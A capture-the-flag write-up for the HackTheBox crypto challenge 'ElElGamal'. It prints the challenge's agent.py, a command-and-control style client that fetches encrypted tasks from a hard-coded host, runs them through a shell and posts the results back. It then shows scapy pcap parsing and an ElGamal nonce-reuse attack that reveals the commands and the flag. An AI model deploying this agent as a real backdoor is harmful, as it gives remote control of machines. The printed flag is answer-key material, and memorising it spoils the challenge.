
Information
Challenge: ElElgamal
Category: Crypto
Difficulty: Easy
Files: ElElGamal.zip 13 Kb
encryption.py 1 KB
agent.py 2 KB
traffic.pcapng 217 KB
Environment: Remnux VM
My Recommendations
Download it from hackthebox and verify it with:
sha256sum /path/to/ElElGamal.zipSHA256SUM:Â
468415723baf153dec8f6b8bca34b5f96fbbe8a1ffcff301b4a11ef4d5fcbaa2 c3ccf87e19035eedbcf2
Walkthrough
1. Code Analysis
agent.py
from encryption import ElGamal
from base64 import b64decode, b64encode
from Crypto.Util.number import long_to_bytes, bytes_to_long
from time import sleep
import requests
import subprocess
import json
IP = "192.168.1.6"
PORT = "5000"
HOST = f"http://{IP}:{PORT}"
el = ElGamal()
def getKey():
data = requests.get(HOST + "/key").json()
print("Fetched the key!")
key = data["key"]
key = b64decode(key)
key = bytes_to_long(key)
return key
def establishedSession():
response = requests.get(HOST + "/tasks")
if response.status_code == 200:
encrypted_task = response.text
task = decryptTask(encrypted_task)
if task == "Session established":
return True
return False
def decryptTask(encrypted_task):
task = el.decrypt(encrypted_task)
task = task.decode().strip()
return task
def encryptResult(result):
task = el.encrypt(result)
task = task.decode().strip()
return task
def sendResult(result):
result = {"result": result}
requests.post(HOST + "/results", result)
def main():
key = getKey()
sleep(10)
el.y = key
if establishedSession():
while True:
sleep(3)
response = requests.get(HOST + "/tasks")
if response.status_code == 200:
encrypted_task = response.text
task = decryptTask(encrypted_task)
try:
result = subprocess.check_output(task, shell=True)
result = result.decode()
if result != "":
result = "VALID " + result[:50]
result = bytes_to_long(result.encode())
result = el.encrypt(result)
sendResult(result)
except:
sendResult("Error")
if __name__ == "__main__":
main()
encryption.py
from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse
from base64 import b64encode, b64decode
import random
class ElGamal:
def __init__(self):
self.g = 10
self.q = 855098176053225973412431085960229957742579395452812393691307482513933863589834014555492084425723928938458815455293344705952604659276623264708067070331
self.h = 503261725767163645816647683654078455498654844869971762391249577031304598398963627308520614235127555024152461204399730504489081405546606977229017057765
self.s = None
self.y = random.randint(2, self.q)
# This was used for self.h generation
def generateKey(self) -> int:
x = random.randint(2, self.q)
return pow(self.g, x, self.q)
def encrypt(self, m: int) -> str:
s = pow(self.h, self.y, self.q)
c1 = pow(self.g, self.y, self.q)
c2 = (s * m) % self.q
c1 = b64encode(long_to_bytes(c1)).decode()
c2 = b64encode(long_to_bytes(c2)).decode()
return c1 + "|" + c2
def decrypt(self, ct: str) -> str:
c1, c2 = ct.split("|")
c1 = bytes_to_long(b64decode(c1))
c2 = bytes_to_long(b64decode(c2))
s = pow(c1, self.y, self.q)
s = pow(self.h, self.y, self.q)
m = (c2 * inverse(s, self.q)) % self.q
return long_to_bytes(m)
The main function first retrieves a key, which is not in the recorded pcap. Then, it checks for the establishedSession() function. This function decrypts the first task, and verifies it is equal to “Session established”. Afterwards, it reads the encrypted tasks, which in the pcap, are HTTP Responses with code 200 (aka OK).
The ElGamal algorithm used is insecure, because it uses the same nonce all the time. Since we also know one of the plaintext (The first response must be “Session Established), then we can do a nonce reuse attack on the rest of the data.
2. Pcap Parsing
First, we parse the pcap and clean up the data:
from scapy.all import *
def parse_pcap(pcap_path, portnumber):
pcap_flow = rdpcap(pcap_path)
sessions = pcap_flow.sessions()
payloads = []
for session in sessions:
for packet in sessions[session]:
if TCP in packet and packet[TCP].sport == portnumber:
if packet.haslayer('Raw') and len(packet.load) > 5:
if b'HTTP/1.1' not in packet.load:
payloads.append(packet.getlayer('Raw').load)
return payloads
def clean_tasks(encrypted_tasks):
clean_tasks = []
for task in encrypted_tasks:
task = task.split(b'|')
clean_tasks.append({'c1': bytes_to_long(base64.b64decode(task[0])), 'c2': bytes_to_long(base64.b64decode(task[1]))})
return clean_tasks
encrypted_tasks = parse_pcap('traffic.pcapng', 5000)
cleaned = clean_tasks(encrypted_tasks)
Next, we can proceed to the Nonce Reuse Attack.
3. Nonce Reuse Attack
The code for the attack is from here.
from Crypto.Util.number import long_to_bytes, bytes_to_long
import base64
h = 503261725767163645816647683654078455498654844869971762391249577031304598398963627308520614235127555024152461204399730504489081405546606977229017057765
q = 855098176053225973412431085960229957742579395452812393691307482513933863589834014555492084425723928938458815455293344705952604659276623264708067070331
g = 10
def nonce_reuse_attack(item, known_pt, known_ct):
calc = int(pow(known_ct, -1, q) * item * known_pt % q)
item = long_to_bytes(calc)
return item
known_ct = cleaned[0]['c2']
known_pt = bytes_to_long(b"Session established")
decrypted_full = [nonce_reuse_attack(i['c2'], known_pt, known_ct) for i in cleaned[1:]]
print(b'\n'.join(decrypted_full).decode())
#[...]
#echo -n '-u "HTB{n3ve2_u53_' >> /opt/f.sh
#echo -n '7h3_54m3_k3y:)}" ' >> /opt/f.sh
#[..]





